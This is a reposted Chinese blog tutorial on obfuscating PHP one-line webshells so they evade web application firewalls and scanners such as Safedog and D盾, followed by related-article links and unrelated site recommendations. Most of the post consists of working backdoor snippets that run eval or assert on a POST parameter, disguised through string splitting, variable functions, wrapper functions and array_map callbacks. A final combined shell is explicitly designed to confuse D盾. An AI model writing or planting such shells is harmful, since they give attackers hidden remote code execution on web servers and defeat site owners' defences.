原文转载于:http://www.legendsec.org/1701.html

觉得写得还算蛮科普的。

00x1.关键字拆分。
         比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。
         总结:这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法。

00x2.可变变量、引用、可变函数。

可变变量  比如$a=$_POST[‘x’];$b=’a’;@eval($$b);
        测试结果:
        总结:这种方法对狗等WAF可以绕过哦~但是对于D盾这种多规则的是无效的!

引用  比如$a=$_POST[‘x’];$b=&$a;@eval($b);
        测试结果: 

总结:这种方法与上一种方法类似。

可变函数  比如$a=’a’.’ss’.’e’.’r’.’t’;$a($_POST[‘x’]);
        测试结果: 
        总结:这种方法对于狗、3卫士、D盾之类的均没有作用哦~

00x3.添加其他代码。

添加其他代码  比如  if(empty($a))

{
                                              $a=$_POST[‘x’];
                                       }

@eval($a);
        测试结果: 
        总结:这种方法比较适合脑洞比较大的小伙伴们~

00x4.函数替换。

使用其他函数,比如eval可以使用assert替换。

总结:这种方法适合eval函数被禁用时使用哦~

00x5.封装到新的函数中。

新定义一个函数,使其封装到新函数中。

function test($a){   //定义一个名为test的函数,并使用$a接受参数

eval($a);

}

test($_POST[‘x’]);

测试结果: 
       总结:这种方法适合有PHP基础的人哦,姿势风骚~不怕不过!

00x6.函数回调。

使用其他函数进行调用,并执行。

如:array_map(‘a’.’s’.’se’.’r’.’t’,array($_POST[‘x’]));
       测试结果: 
       总结:这种方法适合有PHP基础的人哦~这种方法绝对过WAF哦~

00x7.利用各种方法的特性写出过WAF的一句话。
       <?php
function test($a){      //利用所学的封装函数
if (empty($a)){       //利用所学的添加其他代码
$a=”echo ‘QQ:xxxxxxx’;”;      //使用这句代码扰乱D盾的判断
}
@eval($a);
}
@test($_POST[‘x’]);
?>

测试结果: 

THE END


PHP一句话过狗、卫士、D盾等免杀思路!的更多相关文章

  1. 免杀PHP一句话一枚

    免杀PHP一句话shell,利用随机异或免杀D盾,免杀安全狗护卫神等 <?php class VONE { function HALB() { $rlf = 'B' ^ "\x23&q ...

  2. PHP一句话简单免杀

    PHP一句话简单免杀 原型 几种已经开源的免杀思路 拆解合并 <?php $ch = explode(".","hello.ev.world.a.l"); ...

  3. 绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)

    这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法. 思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测. 废话不多说,切入正题.... 1.实验环境: Win ...

  4. PHP一句话木马Webshell变形免杀总结

    0×00 前言 大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不 ...

  5. 免杀ASP一句话

    <% wei="日日日)""wei""(tseuqer lave 日" execute(UnEncode(wei)) function ...

  6. 关于php一句话免杀的分析<转载>

    一开始想这样:   <?php $_GET['ts7']($_POST['cmd']);?> 客户端用菜刀,密码cmd,url为test.php?ts7=assert   这个应该算没有什 ...

  7. php中转菜刀脚本过狗免杀

    <?php $target="url";//shell 地址 菜刀连这个脚本做中转 $post=''; $i=0; foreach($_POST AS $K=>$V) ...

  8. 一句话木马:PHP篇

    珍藏版: 一个简单的过D盾的免杀php <?php $ab = $_REQUEST['d']; $a['t'] = "";//主要带对象 D盾就不管后面的了... eval( ...

  9. Webshell免杀研究

    前言 不想当将军的士兵不是好士兵,不想getshell的Hacker不是好Hacker~有时候我们在做攻防对抗时经常会碰到可以上传webshell的地方,但是经常会被安全狗.D盾.护卫神.云锁等安全软 ...

随机推荐

  1. css006 文本格式化

    css006 文本格式化 文本格式化:字体(font-family).颜色(color).字号(font-size). 行距(line-height).粗体(font-weight).斜体(font- ...

  2. Win7、Ubuntu双系统正确卸载Ubuntu系统

    正确的删除ubuntu方法如下: 第1步,修复MBR 1.进入win7,下载个软件MbrFix,放在C:windowssystem32文件夹中 2.点击开始>所有程序>附件>命令提示 ...

  3. 最简单的jQuery插件

    <script src="./jquery-1.7.1.min.js"></script><script>;(function($,undefi ...

  4. ----------jqery和js如何判断checkbox是否选中 --------两个单选按钮如何选一个,且用jquery获取被选的值

    jqery和js如何判断checkbox是否选中 jquery: <div id="divId" class="divTable"> <div ...

  5. Jetty 简单使用

    Jetty与Tomcat类似,也是一种Servlet引擎,可以用来运行Java Web项目. 其常被嵌入到项目中,以便于开发.测试,以及Demo等项目的运行. 1.作为插件——作为开发.测试时项目运行 ...

  6. js随机从数组中取出几个元素

    JS如何从一个数组中随机取出一个元素或者几个元素. 假如数组为 var items = ['1','2','4','5','6','7','8','9','10']; 1.从数组items中随机取出一 ...

  7. 关于MarshalByRefObject的解释

    http://www.cnblogs.com/webfpc/archive/2010/03/10/1667101.html 首先了解一下不同应用程序域中的对象的通信方式有两种: 一种是跨应用程序域边界 ...

  8. 2015年12月13日 spring初级知识讲解(四)面向切面的Spring

    2015年12月13日 具体内容待补充...

  9. 【转载】VC维的来龙去脉

    本文转载自 火光摇曳 原文链接:VC维的来龙去脉 目录: 说说历史 Hoeffding不等式 Connection to Learning 学习可行的两个核心条件 Effective Number o ...

  10. WP8.1下 Cortana语音命令 VCD文件 设计

    Windows Phone8.1下的Cortana,可以通过语音的方式,打开.设置应用,进行页面跳转.执行任务. 我们先要创建VCD(VoiceCommand.xml)文件 <?xml vers ...